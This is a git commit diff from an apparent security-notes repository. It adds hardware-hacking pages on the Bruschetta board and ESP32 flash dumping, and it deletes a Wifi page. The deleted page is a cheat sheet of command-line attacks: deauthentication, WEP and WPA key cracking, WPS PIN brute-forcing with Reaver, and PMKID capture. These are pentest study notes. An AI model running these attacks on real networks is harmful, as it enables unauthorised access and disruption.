Wifi - WPA EAP
parent
3e27eb1ea5
commit
b118b6412d
|
@ -87,7 +87,6 @@
|
||||||
|
|
||||||
## Dump Flash via SPI
|
## Dump Flash via SPI
|
||||||
|
|
||||||
|
|
||||||
* Using [flashrom/flashroom](https://github.com/flashrom/flashrom)
|
* Using [flashrom/flashroom](https://github.com/flashrom/flashrom)
|
||||||
```ps1
|
```ps1
|
||||||
sudo apt-get install build-essential pciutils usbutils libpci-dev libusb-dev libftdi1 libftdi-dev zlib1g-dev subversion libusb-1.0-0-dev
|
sudo apt-get install build-essential pciutils usbutils libpci-dev libusb-dev libftdi1 libftdi-dev zlib1g-dev subversion libusb-1.0-0-dev
|
||||||
|
@ -213,8 +212,6 @@ $ binwalk -E fw
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## Encrypted firmware
|
## Encrypted firmware
|
||||||
|
|
||||||
![](https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/1581004558438-UJV08PX8O5NVAQ6Z8HXI/ke17ZwdGBToddI8pDm48kHSRIhhjdVQ3NosuzDMrTulZw-zPPgdn4jUwVcJE1ZvWQUxwkmyExglNqGp0IvTJZamWLI2zvYWH8K3-s\_4yszcp2ryTI0HqTOaaUohrI8PIYASqlw8FVQsXpiBs096GedrrOfpwzeSClfgzB41Jweo/Picture2.png?format=1000w)
|
![](https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/1581004558438-UJV08PX8O5NVAQ6Z8HXI/ke17ZwdGBToddI8pDm48kHSRIhhjdVQ3NosuzDMrTulZw-zPPgdn4jUwVcJE1ZvWQUxwkmyExglNqGp0IvTJZamWLI2zvYWH8K3-s\_4yszcp2ryTI0HqTOaaUohrI8PIYASqlw8FVQsXpiBs096GedrrOfpwzeSClfgzB41Jweo/Picture2.png?format=1000w)
|
||||||
|
|
|
@ -0,0 +1,30 @@
|
||||||
|
# Bruschetta
|
||||||
|
|
||||||
|
![](https://github.com/whid-injector/BRUSCHETTA-board/raw/main/images/Mode%202%20-%20SPI%20and%20I2C.jpg)
|
||||||
|
|
||||||
|
|
||||||
|
## Documentation
|
||||||
|
|
||||||
|
* [whid-injector/BRUSCHETTA-Board](https://github.com/whid-injector/BRUSCHETTA-Board) - The Multi-Protocol Swiss-Army-Knife for Hardware Hackers (UART/JTAG/SPI/I2C)
|
||||||
|
* [whid-injector/PIZZAbite](https://github.com/whid-injector/PIZZAbite) - A cheaper and open-hardware version of the blasoned Sensepeek's PCBite for Hardware Hacking and DIY Hobbyists
|
||||||
|
|
||||||
|
![](https://private-user-images.githubusercontent.com/26245612/270132857-2a87c37b-01fa-427c-87e4-f95feca5f2b6.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MDc0MDI1OTgsIm5iZiI6MTcwNzQwMjI5OCwicGF0aCI6Ii8yNjI0NTYxMi8yNzAxMzI4NTctMmE4N2MzN2ItMDFmYS00MjdjLTg3ZTQtZjk1ZmVjYTVmMmI2LmpwZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDAyMDglMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwMjA4VDE0MjQ1OFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTRjYWJhMGMwMDQwMDJlNjUxMzRhMWZlMjdmZTMwYjJjYmFkYmNhZjZiNzIzZWU0MTdiOTRhZTI3OTU0MDJkOTkmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.-cCmS3eF-ps8FtJwvRunCnxJS6DedYPc_DirD0Jl3-A)
|
||||||
|
|
||||||
|
Bruschetta is the latest board to interact with Hardware, it is an upgraded version of these projects.
|
||||||
|
|
||||||
|
* [whid-injector/Focaccia-Board](https://github.com/whid-injector/Focaccia-Board) - Multipurpose Breakout for the FT232H
|
||||||
|
* [whid-injector/Burtleina-Board](https://github.com/whid-injector/Burtleina-Board) - Yet another Multipurpose Breakout Board to hack hardware in a clean and easy way
|
||||||
|
* [whid-injector/NANDo-board](https://github.com/whid-injector/NANDo-board) - 2nd Generation of Multipurpose FTDI-based board for Hardware Hacking and IoT Security Testing
|
||||||
|
|
||||||
|
|
||||||
|
## Usage
|
||||||
|
|
||||||
|
- Mode 2 (UART1+I2C+SPI-VCP): S1=ON and S2=OFF
|
||||||
|
- Mode 4 (UART1+JTAG): S1=ON and S2=ON
|
||||||
|
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [🍕PIZZAbite & BRUSCHETTA-board: The Hardware Hacking Toolkit you need for your own Lab! 🇮🇹 - WHID - We Hack In Disguise - 28 sept. 2023](https://www.youtube.com/watch?v=r7BOBPbq83M)
|
||||||
|
* [PIZZAbite & BRUSCHETTA-board: The Hardware Hackers tools you need to kickstart your own Lab! - WHID - We Hack In Disguise - SEP 28, 2023](https://www.whid.ninja/blog/pizzabite-bruschetta-board-the-hardware-hackers-tools-you-need-to-kickstart-your-own-lab)
|
||||||
|
* [Hacking IoT & RF Devices with BürtleinaBoard™ - Luca Bongiorni - Jul 27, 2020](https://lucabongiorni.medium.com/hacking-iot-rf-devices-with-bürtleinaboard-165e246b1ed0)
|
|
@ -0,0 +1,33 @@
|
||||||
|
# ESP32
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
* [espressif/esptool](https://github.com/espressif/esptool) - Espressif SoC serial bootloader utility
|
||||||
|
* [jmswrnr/esp32knife](https://github.com/jmswrnr/esp32knife) - Tools for ESP32 firmware dissection
|
||||||
|
|
||||||
|
|
||||||
|
## Flashing
|
||||||
|
|
||||||
|
The ESP32 microprocessor uses the Xtensa instruction set, use `Tensilica Xtensa 32-bit little-endian` in Ghidra.
|
||||||
|
|
||||||
|
* Dump the flash
|
||||||
|
```ps1
|
||||||
|
esptool -p COM7 -b 115200 read_flash 0 0x400000 flash.bin
|
||||||
|
```
|
||||||
|
|
||||||
|
* Dissect the flash
|
||||||
|
```ps1
|
||||||
|
python esp32knife.py --chip=esp32 load_from_file ./flash.bin
|
||||||
|
```
|
||||||
|
|
||||||
|
* Flash the new firmware
|
||||||
|
```ps1
|
||||||
|
# repair the checksum
|
||||||
|
python esp32fix.py --chip=esp32 app_image ./patched.part.3.factory
|
||||||
|
esptool -p COM7 -b 115200 write_flash 0x10000 ./patched.part.3.factory.fixed
|
||||||
|
```
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [ESP32-reversing - BlackVS](https://github.com/BlackVS/ESP32-reversing)
|
||||||
|
|
|
@ -1,692 +0,0 @@
|
||||||
# Wifi
|
|
||||||
|
|
||||||
### Tools
|
|
||||||
|
|
||||||
* Wifite - https://github.com/derv82/wifite
|
|
||||||
* Wifite2 Rewrite - https://github.com/kimocoder/wifite2
|
|
||||||
* Wifite2 Original - https://github.com/derv82/wifite2
|
|
||||||
|
|
||||||
### Linux Wireless Basics
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
AP_MAC="XX:XX:XX:XX:XX" # BSSID
|
|
||||||
VICTIM_MAC="XX:XX:XX:XX:XX" # VIC
|
|
||||||
ATTACKER_MAC="XX:XX:XX:XX:XX" # MON
|
|
||||||
AP_SSID="wifibox" # ESSID
|
|
||||||
SRC_ADDR="192.168.1.1"
|
|
||||||
DST_ADDR="192.168.1.255"
|
|
||||||
```
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# driver install
|
|
||||||
apt install realtek-rtl88xxau-dkms
|
|
||||||
|
|
||||||
# network card recon
|
|
||||||
iwconfig
|
|
||||||
iw list
|
|
||||||
dmesg | grep 8187 # alfa card
|
|
||||||
|
|
||||||
# Increase Wi-Fi TX Power
|
|
||||||
iw reg set B0
|
|
||||||
iwconfig wlan0 txpower <NmW|NdBm|off|auto> # txpower is 30 (usually)
|
|
||||||
|
|
||||||
# find SSID and channel
|
|
||||||
iw dev wlan0 scan | grep SSID
|
|
||||||
iw dev wlan0 scan | egrep "DS\ Parameter\ set|SSID"
|
|
||||||
iwlist wlan0 scanning | egrep "ESSID|Channel"
|
|
||||||
|
|
||||||
# monitor mode - start
|
|
||||||
airmon-ng start wlan0
|
|
||||||
airmon-ng start wlan0 3 # only on a particular channel e.g: 3
|
|
||||||
* Manual 1: iw dev wlan0 interface add mon0 type monitor
|
|
||||||
* Manual 2: iwconfig wlan0 mode monitor channel 3
|
|
||||||
ifconfig mon0 up
|
|
||||||
# monitor mode - stop
|
|
||||||
airmon-ng stop mon0
|
|
||||||
* Manual 1: iw dev wlan0 interface del mon0
|
|
||||||
* Manual 2: iwconfig wlan0 mode managed
|
|
||||||
```
|
|
||||||
|
|
||||||
### Aircrack-ng Essentials
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# check and kill processes that could interfere with our monitor mode
|
|
||||||
airmon-ng check
|
|
||||||
airmon-ng check kill
|
|
||||||
# pkill dhclient; pkill wpa_supplicant; pkill dhclient3
|
|
||||||
|
|
||||||
# list AP
|
|
||||||
airodump-ng mon0
|
|
||||||
airodump-ng mon0 -c 3 # only on a particular channel e.g: 3
|
|
||||||
airodump-ng mon0 -c 3 --bssid $AP_MAC -w clearcap # dump traffic
|
|
||||||
|
|
||||||
# get our macaddress
|
|
||||||
macchanger -s mon0
|
|
||||||
macchanger --show mon0
|
|
||||||
|
|
||||||
# replay and accelerate traffic
|
|
||||||
aireplay-ng
|
|
||||||
* -i interface
|
|
||||||
* -r file.pcap
|
|
||||||
|
|
||||||
# check aireplay card compatibility
|
|
||||||
aireplay-ng -9 mon0 -> test injection
|
|
||||||
aireplay-ng -9 -i wlan1 mon0 -> test card to card injection
|
|
||||||
|
|
||||||
# injection rate
|
|
||||||
iwconfig wlan0 rate 1M
|
|
||||||
|
|
||||||
# Aircrack compatibility
|
|
||||||
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#list_of_compatible_adapters
|
|
||||||
Alfa AWUS036H / TPLink WN722
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Fake authentication attack
|
|
||||||
|
|
||||||
:warning: use it before each attack
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airodump-ng -c 3 --bssid $AP_MAC -w wep1 mon0
|
|
||||||
|
|
||||||
# fake authentication = no arp
|
|
||||||
aireplay-ng -1 0 -e AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0
|
|
||||||
* Might need a real $ATTACKER_MAC, observe traffic using airodump
|
|
||||||
> Association successful! :-)
|
|
||||||
|
|
||||||
# fake authentication for picky AP
|
|
||||||
# Send keep-alive packets every 10 seconds
|
|
||||||
aireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>
|
|
||||||
|
|
||||||
# might need to fake your MAC ADDRESS first
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Deauthentication attack
|
|
||||||
|
|
||||||
> Force ARP packet to be sent.
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
|
||||||
* -0 : 1 deauthentication, 0 unlimited
|
|
||||||
> Sending 64 directed DeAuth.
|
|
||||||
```
|
|
||||||
|
|
||||||
#### ARP Replay Attack
|
|
||||||
|
|
||||||
Video: wifu-20.mp4 The attack listens for an ARP packet and then retransmits it back to the access point. This, in turn, causes the AP to repeat the ARP packet with a new IV. By collecting enough of these IVs Aircrack-ng can then be used to crack the WEP key.
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0
|
|
||||||
* ATTACKER_MAC if fake authentication launched
|
|
||||||
* CONNECTED_MAC if a client is associated
|
|
||||||
|
|
||||||
# –x 1000 –n 1000 ?
|
|
||||||
# aireplay-ng -3 –x 1000 –n 1000 –b $AP_MAC -h $ATTACKER_MAC wlan0mon
|
|
||||||
# wait for ARP on the network
|
|
||||||
# alternatively you can de-auth some clients
|
|
||||||
|
|
||||||
aircrack-ng –b <BSSID> <PCAP_of_FileName>
|
|
||||||
aircrack-ng -0 wep1.cap
|
|
||||||
* -0 : colored output
|
|
||||||
```
|
|
||||||
|
|
||||||
### Cracking WEP via a Client
|
|
||||||
|
|
||||||
#### ARP Request Replay Attack
|
|
||||||
|
|
||||||
> Attack the ACCESS POINT
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airmon-ng start wlan0 3 # only a particular channel : 3
|
|
||||||
airodump-ng mon0 -c 3 --bssid $AP_MAC -w arpreplay # dump traffic
|
|
||||||
|
|
||||||
# Fake authentication for a more reliable attack
|
|
||||||
aireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0
|
|
||||||
|
|
||||||
# ARP replay attack
|
|
||||||
aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0
|
|
||||||
|
|
||||||
# Deauthentication
|
|
||||||
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
|
||||||
|
|
||||||
# Cracking
|
|
||||||
aircrack-ng arpreplay.cap
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Interactive replay attack
|
|
||||||
|
|
||||||
> Attack a client to force new packets 0841 attack, or interactive packet replay is a WEP attack that allows for packet injection when ARP replay is not available/working.
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airmon-ng start wlan0 3 # only a particular channel : 3
|
|
||||||
airodump-ng -c 3 --bssid $AP_MAC -w clearcap mon0 # dump traffic
|
|
||||||
|
|
||||||
# fake authentication for a more reliable attack
|
|
||||||
aireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0
|
|
||||||
|
|
||||||
# interactive replay attack (min arp 68, max arp 86)
|
|
||||||
aireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 # interactive - natural selection of a packet
|
|
||||||
aireplay-ng -2 -b $AP_MAC -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0 # interactive - force create a packet
|
|
||||||
# Packet selection (ARP packets met the characteristics):
|
|
||||||
# - APs will always repeat packets destined to the broadcast
|
|
||||||
# - The packet will have the ToDS (To Distribution System) bit set to 1
|
|
||||||
# answer "y" multiple times
|
|
||||||
|
|
||||||
# cracking require ~> 250000 IVs
|
|
||||||
aircrack-ng -0 -z -n 64 clientwep-01.cap
|
|
||||||
* -z: PTW attack
|
|
||||||
* -n: number of bits in the WEP key
|
|
||||||
|
|
||||||
# backup file with an ARP packet
|
|
||||||
aireplay-ng -2 -r replay.cap mon0
|
|
||||||
```
|
|
||||||
|
|
||||||
### Cracking WEP without a Client
|
|
||||||
|
|
||||||
* Chopchop & Fragmentation attack => PRGA, generate more packets with weak IVs
|
|
||||||
* Need an AP configured with open system authentication
|
|
||||||
|
|
||||||
Prerequisite:
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# put into monitor mode on our desired channel
|
|
||||||
airmon-ng start wlan0 3 # only a particular channel : 3
|
|
||||||
airodump-ng -c 3 --bssid $AP_MAC -w wepcrack mon0 # see no client
|
|
||||||
|
|
||||||
# fake authentication attack with association timing (every 60s try to reassociate)
|
|
||||||
aireplay-ng -1 60 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0 # should see a client in airodump
|
|
||||||
# -1 6000 to avoid a time out.
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Fragmentation attack
|
|
||||||
|
|
||||||
> Goal: 1500 bytes of PRGA Atheros does not generate the correct packets unless the wireless card is set to the MAC address you are spoofing.
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# attacker mac must be associated (fake auth)
|
|
||||||
# Press "Y"
|
|
||||||
aireplay-ng -5 -b $AP_MAC -h $ATTACKER_MAC mon0
|
|
||||||
|
|
||||||
# use our PRGA from the fragmentation attack to generate an ARP request
|
|
||||||
# SRC_ADDR: 192.168.1.100
|
|
||||||
# DST_ADDR: 192.168.1.255, should not exist (broadcast address)
|
|
||||||
packetforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y frag.xor -w inject.cap
|
|
||||||
# -k: the destination IP i.e. in ARP, this is "Who has this IP"
|
|
||||||
# -l: the source IP i.e. in ARP, this is "Tell this IP"
|
|
||||||
|
|
||||||
# check the packet
|
|
||||||
tcpdump -n -vvv -e -s0 -r inject.cap
|
|
||||||
|
|
||||||
# inject our crafted packet
|
|
||||||
aireplay-ng -2 -r inject.cap mon0
|
|
||||||
|
|
||||||
# crack the WEP key
|
|
||||||
# Aircrack-ng will auto-update when new IVs are available
|
|
||||||
aircrack-ng -0 wepcrack
|
|
||||||
|
|
||||||
# if 64-bit WEP is used, cracking time < 5 minutes
|
|
||||||
# switch to 128-bit keys after 600000 IVs
|
|
||||||
# use the `-f 4` after 2000000
|
|
||||||
aircrack-ng -n 64 <capture filename>
|
|
||||||
```
|
|
||||||
|
|
||||||
#### KoreK Chopchop attack
|
|
||||||
|
|
||||||
> Can't be used for every AP, might work when fragmentation fails Much slower than the fragmentation attack
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# chopchop attack: -4
|
|
||||||
# out decrypted: .cap
|
|
||||||
# out prga: .xor
|
|
||||||
# Press "Y" (choose a small packet)
|
|
||||||
aireplay-ng -4 -b $AP_MAC -h $ATTACKER_MAC mon0
|
|
||||||
|
|
||||||
# check the packet and find the network addresses
|
|
||||||
tcpdump -n -vvv -e -s0 -r inject.cap
|
|
||||||
|
|
||||||
# use our PRGA from the fragmentation attack
|
|
||||||
# SRC_ADDR: 192.168.1.100
|
|
||||||
# DST_ADDR: 192.168.1.255, should not exist (broadcast address)
|
|
||||||
packetforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y prga.xor -w chochop_out.cap
|
|
||||||
|
|
||||||
# inject our crafted packet
|
|
||||||
aireplay-ng -2 -r chochop_out.cap mon0
|
|
||||||
|
|
||||||
# crack the WEP key
|
|
||||||
aircrack-ng -0 wepcrack
|
|
||||||
```
|
|
||||||
|
|
||||||
### Bypassing WEP Shared Key Authentication SKA
|
|
||||||
|
|
||||||
> By default, most wireless drivers will attempt open authentication first. If open authentication fails, they will proceed to try shared authentication.
|
|
||||||
|
|
||||||
Prerequisite:
|
|
||||||
|
|
||||||
* Authentication: Shared Key
|
|
||||||
* When Fake Authentication => `AP rejects open-system authentication`
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# put into monitor mode on our desired channel
|
|
||||||
airmon-ng start wlan0 3 # only a particular channel : 3
|
|
||||||
airodump-ng -c 3 --bssid $AP_MAC -w sharedkey mon0
|
|
||||||
|
|
||||||
# deauthentication attack on the connected client
|
|
||||||
# airodump should display SKA under the AUTH column
|
|
||||||
# PRGA file will be saved as xxxx.xor
|
|
||||||
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
|
||||||
# TO CHECK aireplay-ng -0 10 –a $AP_MAC -c $VICTIM_MAC mon0
|
|
||||||
|
|
||||||
# fake authentication attack with association timing (every 60s try to reassociate)
|
|
||||||
# should display switching to Shared Key Authentication
|
|
||||||
# If you are using a PRGA file obtained from a chopchop attack, make sure that it is at least 144 bytes long
|
|
||||||
# If you have "Part2: Association Not answering...(Step3)" -> spoof the mac address used to fake auth
|
|
||||||
aireplay-ng -1 60 -e $AP_SSID -y sharedkey.xor -b $AP_MAC -h $ATTACKER_MAC mon0
|
|
||||||
|
|
||||||
# ARP replay attack
|
|
||||||
aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0
|
|
||||||
|
|
||||||
# deauthentication attack on the connected client
|
|
||||||
# speed the ARP attack process using deauth
|
|
||||||
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
|
||||||
# TO CHECK: aireplay-ng –-deauth 1 –a $AP_MAC -h <FakedMac> wlan0mon
|
|
||||||
|
|
||||||
# crack the WEP key
|
|
||||||
aircrack-ng sharedkey.cap
|
|
||||||
```
|
|
||||||
|
|
||||||
### Cracking WPA PSK
|
|
||||||
|
|
||||||
#### Cracking WPA with John the Ripper
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# put into monitor mode on our desired channel
|
|
||||||
airmon-ng start wlan0 3 # only a particular channel : 3
|
|
||||||
airodump-ng -c 3 --bssid $AP_MAC -w wpajohn mon0 # see no client
|
|
||||||
|
|
||||||
# deauthentication to get the WPA handshake (Sniffing should show the 4-way handshake)
|
|
||||||
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
|
||||||
|
|
||||||
# crack without john the ripper (-b <BSSID>)
|
|
||||||
aircrack-ng -0 -w /pentest/passwords/john/password.lst wpajohn-01.cap
|
|
||||||
aircrack-ng -0 -w /pentest/passwords/john/password.lst wpajohn-01.cap
|
|
||||||
aircrack-ng -w password.lst,secondlist.txt wpajohn-01.cap # multiple dicts
|
|
||||||
|
|
||||||
# crack with john the ripper - combine mangling rules with aircrack
|
|
||||||
# rules example to add in /pentest/passwords/john/john.conf
|
|
||||||
# $[0-9]$[0-9]
|
|
||||||
# $[0-9]$[0-9]$[0-9]
|
|
||||||
john --wordlist=/pentest/wireless/aircrack-ng/test/password.lst --rules --stdout | aircrack-ng -0 -e $AP_SSID -w - /root/wpajohn
|
|
||||||
|
|
||||||
# generate PMKs for a faster cracking - Precomputed WPA Keys Database Attack
|
|
||||||
echo wifu > essid.txt
|
|
||||||
airolib-ng test.db --import essid essid.txt
|
|
||||||
airolib-ng test.db --stats
|
|
||||||
airolib-ng test.db --import passwd /pentest/passwords/john/password.lst
|
|
||||||
airolib-ng test.db --batch
|
|
||||||
airolib-ng test.db --stats
|
|
||||||
aircrack-ng -r test.db wpajohn-01.cap
|
|
||||||
# airolib-ng test.db --clean all
|
|
||||||
|
|
||||||
# Not in lab - Convert to hccap to use with John Jumbo
|
|
||||||
aircrack-ng <FileName>.cap -J <outFile>
|
|
||||||
hccap2john <outFile>.hccap > <JohnOutFile>
|
|
||||||
john <JohnOutFile>
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Cracking WPA with coWPAtty
|
|
||||||
|
|
||||||
> Better for PMK Rainbow table attacks
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# put into monitor mode on our desired channel
|
|
||||||
airmon-ng start wlan0 3 # only a particular channel : 3
|
|
||||||
airodump-ng -c 3 --bssid $AP_MAC -w wpacow mon0 # see no client
|
|
||||||
|
|
||||||
# deauthentication to get the WPA handshake
|
|
||||||
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
|
||||||
|
|
||||||
# coWPAtty dictionary mode (slow)
|
|
||||||
cowpatty -r wpacow-01.cap -f /pentest/passwords/john/password.lst -2 -s $AP_SSID
|
|
||||||
|
|
||||||
# coWPAtty rainbow table mode (fast)
|
|
||||||
genpmk -f /pentest/passwords/john/password.lst -d wifuhashes -s $AP_SSID
|
|
||||||
cowpatty -r wpacow-01.cap -d wifuhashes -2 -s $AP_SSID
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Cracking WPA with Pyrit
|
|
||||||
|
|
||||||
> Can use GPU
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# put into monitor mode on our desired channel
|
|
||||||
airmon-ng start wlan0 3 # only a particular channel : 3
|
|
||||||
airodump-ng -c 3 --bssid $AP_MAC -w wpapyrit mon0 # see no client
|
|
||||||
|
|
||||||
# deauthentication to get the WPA handshake
|
|
||||||
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
|
|
||||||
|
|
||||||
# clean the cap and extract only good packets
|
|
||||||
pyrit -r wpapyrit-01.cap analyze
|
|
||||||
pyrit -r wpapyrit-01.cap -o wpastripped.cap strip
|
|
||||||
|
|
||||||
# dictionary attack - slow ++
|
|
||||||
pyrit -r wpapyrit-01.cap -i /pentest/passwords/john/password.lst -b $AP_MAC attack_passthrough
|
|
||||||
|
|
||||||
# pre-computed hashes attack - slow on CPU
|
|
||||||
pyrit eval # pwds in database
|
|
||||||
pyrit -i /pentest/passwords/john/password.lst import_passwords # import in the database
|
|
||||||
pyrit -e $AP_SSID create_essid
|
|
||||||
pyrit batch # generate
|
|
||||||
pyrit -r wpastripped.cap attack_db
|
|
||||||
|
|
||||||
# gpu power attack - fast on GPU
|
|
||||||
pyrit list_cores
|
|
||||||
pyrit -i /pentest/passwords/john/password.lst import_passwords # import in the database
|
|
||||||
pyrit -e $AP_SSID create_essid
|
|
||||||
pyrit batch
|
|
||||||
pyrit -r wpastripped.cap attack_db
|
|
||||||
```
|
|
||||||
|
|
||||||
#### WPA WPS Attack
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
airmon-ng start wlan0
|
|
||||||
airodump-ng mon0
|
|
||||||
|
|
||||||
# Install
|
|
||||||
apt-get -y install build-essential libpcap-dev aircrack-ng pixiewps
|
|
||||||
git clone https://github.com/t6x/reaver-wps-fork-t6x
|
|
||||||
apt-get install reaver
|
|
||||||
|
|
||||||
# Reaver integrated dumping tool (can also airodump-ng)
|
|
||||||
# Wash gives information about WPS being locked or not
|
|
||||||
# Locked WPS will have less success chances
|
|
||||||
wash -i mon0
|
|
||||||
|
|
||||||
# Launch Reaver
|
|
||||||
reaver -i mon0 -b $AP_MAC -vv -S
|
|
||||||
reaver -i mon0 -c <Channel> -b $AP_MAC -p <PinCode> -vv -S
|
|
||||||
reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv
|
|
||||||
|
|
||||||
|
|
||||||
# Now using pixiexps, you can crack PIN offline
|
|
||||||
pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
|
|
||||||
# Then, you can use the PIN with reaver to get to cleartext password
|
|
||||||
reaver -i <monitor interface> -b <bssid> -c <channel> -p <PIN>
|
|
||||||
|
|
||||||
|
|
||||||
# Some manufacturers have implemented protections
|
|
||||||
# You can try different switches to bypass
|
|
||||||
# -L = Ignore locked state
|
|
||||||
# -N = Don't send NACK packets when errors are detected
|
|
||||||
# -d = delay X seconds between PIN attempts
|
|
||||||
# -T = set timeout period to X second (.5 means half second)
|
|
||||||
# -r = After X attemps, sleep for Y seconds
|
|
||||||
reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv -L -N -d 15 -T .5 -r 3:15
|
|
||||||
```
|
|
||||||
|
|
||||||
> Message "WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying" -> AP is protected Message "WARNING: Receive timeout occured" -> AP is too far
|
|
||||||
|
|
||||||
#### WPA PMKID Attack
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
INTERFACE=$(ifconfig | grep wlp | cut -d":" -f1) # mon0
|
|
||||||
|
|
||||||
# PMKID capture
|
|
||||||
# Note: Based on the noise on the wifi channel it can take some time to receive the PMKID.
|
|
||||||
# It can take a while to capture PKMID (several minutes++)
|
|
||||||
# We recommend running hcxdumptool up to 10 minutes before aborting.
|
|
||||||
# If an AP recieves our association request packet and supports sending
|
|
||||||
# sudo hcxdumptool -i wlan0mon -o outfile.pcapng --enable_status=1
|
|
||||||
PMKID=$(sudo hcxdumptool -o test.pcapng -i $INTERFACE --enable_status --filtermode=2)
|
|
||||||
echo $PMKID|grep 'FOUND PMKID' &> /dev/null
|
|
||||||
hcxpcaptool -z test.16800 test.pcapng
|
|
||||||
|
|
||||||
# Then convert the captured data to a suitable format for hashcat
|
|
||||||
# -E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs)
|
|
||||||
# -I retrieve identities from WiFi-traffic
|
|
||||||
# -U retrieve usernames from WiFi-traffic
|
|
||||||
# PMKID*MAC AP*MAC Station*ESSID
|
|
||||||
# 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a
|
|
||||||
hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng
|
|
||||||
|
|
||||||
# Cracking the HASH
|
|
||||||
hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
|
|
||||||
hashcat -m 16800 -d 1 -w 3 myHashes rockyou.txt
|
|
||||||
|
|
||||||
# Check clGetPlatformIDs(): CL_PLATFORM_NOT_FOUND_KHR
|
|
||||||
```
|
|
||||||
|
|
||||||
#### Cracking WPA with Bettercap
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# install and update
|
|
||||||
go get github.com/bettercap/bettercap
|
|
||||||
cd $GOPATH/src/github.com/bettercap/bettercap
|
|
||||||
make build && sudo make install
|
|
||||||
sudo bettercap -eval "caplets.update; q"
|
|
||||||
|
|
||||||
# run and recon the wifi APs
|
|
||||||
sudo bettercap -iface wlan0
|
|
||||||
# this will set the interface in monitor mode and start channel hopping on all supported frequencies
|
|
||||||
> wifi.recon on
|
|
||||||
# we want our APs sorted by number of clients for this attack, the default sorting would be `rssi asc`
|
|
||||||
> set wifi.show.sort clients desc
|
|
||||||
# every second, clear our view and present an updated list of nearby WiFi networks
|
|
||||||
> set ticker.commands 'clear; wifi.show'
|
|
||||||
> ticker on
|
|
||||||
# use the good channel
|
|
||||||
> wifi.recon.channel 1
|
|
||||||
```
|
|
||||||
|
|
||||||
**Bettercap WPA - Deauth and crack**
|
|
||||||
|
|
||||||
```powershell
|
|
||||||
# use the bssid of the AP
|
|
||||||
